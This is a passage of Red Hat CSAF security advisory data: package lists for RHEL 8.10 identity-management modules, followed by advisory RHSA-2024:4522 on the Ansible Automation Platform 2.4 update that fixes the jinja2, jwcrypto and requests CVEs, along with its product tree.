"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-jwcrypto: malicious JWE token can cause denial of service"
}
]
}
RHSA-2024:4522
Vulnerability from csaf_redhat
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Ansible Automation Platform 2.4\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.\n\nSecurity Fix(es):\n\n* automation-controller: jinja2: accepts keys containing non-attribute characters (CVE-2024-34064)\n* automation-controller: jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)\n* automation-controller: requests: subsequent requests to the same host ignore cert verification (CVE-2024-35195)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nUpdates and fixes for automation controller:\n* Fixed a bug where the controller does not respect \"DATABASES[\u2018OPTIONS\u2019]\" setting, if specified (AAP-26398)\n* Changed all uses of \"ImplicitRoleField\" to perform an \"on_delete=SET_NULL\" (AAP-25136)\n* Fixed the HostMetric automated counter to display the correct values (AAP-25115)\n* Added Django logout redirects (AAP-24543)\n* automation-controller has been updated to 4.5.8\n\nAdditional changes:\n* aap-metrics-utility has been updated to 0.3.0 (AAP-25875)\n* ansible-core has been updated to 2.15.12 (AAP-25536)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:4522",
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "2279476",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279476"
},
{
"category": "external",
"summary": "2282114",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2282114"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_4522.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix Update",
"tracking": {
"current_release_date": "2025-10-24T13:27:38+00:00",
"generator": {
"date": "2025-10-24T13:27:38+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.10"
}
},
"id": "RHSA-2024:4522",
"initial_release_date": "2024-07-12T01:43:40+00:00",
"revision_history": [
{
"date": "2024-07-12T01:43:40+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-07-12T01:43:40+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-10-24T13:27:38+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.4::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_inside:2.4::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_developer:2.4::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.4::el8"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_inside:2.4::el8"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_developer:2.4::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Ansible Automation Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el9ap.src",
"product": {
"name": "ansible-core-1:2.15.12-1.el9ap.src",
"product_id": "ansible-core-1:2.15.12-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el9ap?arch=src\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.src",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.src",
"product_id": "automation-controller-0:4.5.8-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el8ap.src",
"product": {
"name": "ansible-core-1:2.15.12-1.el8ap.src",
"product_id": "ansible-core-1:2.15.12-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el8ap?arch=src\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.src",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.src",
"product_id": "automation-controller-0:4.5.8-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el9ap.noarch",
"product": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch",
"product_id": "ansible-core-1:2.15.12-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el9ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "ansible-test-1:2.15.12-1.el9ap.noarch",
"product": {
"name": "ansible-test-1:2.15.12-1.el9ap.noarch",
"product_id": "ansible-test-1:2.15.12-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-test@2.15.12-1.el9ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"product": {
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"product_id": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-cli@4.5.8-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"product": {
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
